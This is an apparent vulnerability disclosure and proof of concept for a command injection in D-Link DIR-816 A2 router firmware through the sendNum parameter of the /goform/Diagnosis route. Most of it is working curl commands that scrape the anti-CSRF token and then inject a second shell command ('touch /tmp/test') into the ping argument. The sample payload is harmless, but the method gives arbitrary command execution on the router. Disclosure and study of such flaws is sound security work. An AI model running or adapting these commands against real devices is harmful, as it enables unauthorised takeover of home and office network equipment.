D-Link DIR-816 A2 Command Injection
Firmware version:1.10 B05
Exploit Author: email@example.com
Vendor Homepage: http://www.dlink.com.cn/
In the handler of route
/goform/Diagnosis, the value of parameter
sendNum is used in the construction of command
ping -c %s ..., which is later fed to
So it could lead to command injection with crafted request.
There's a random token required by the route, which is used as a mitigation against CSRF. So first we need to get its value:
TOKENID=`curl -s http://192.168.0.1/dir_login.asp | grep tokenid | head -1 | grep -o 'value="[0-9]*"' | cut -f 2 -d = | tr -d '"'`
Then we could send the crafted parameter along with the token to the route:
curl -i -X POST http://192.168.0.1/goform/Diagnosis -d tokenid=$TOKENID -d 'pingAddr=192.168.0.1' -d 'sendNum=3;touch /tmp/test;'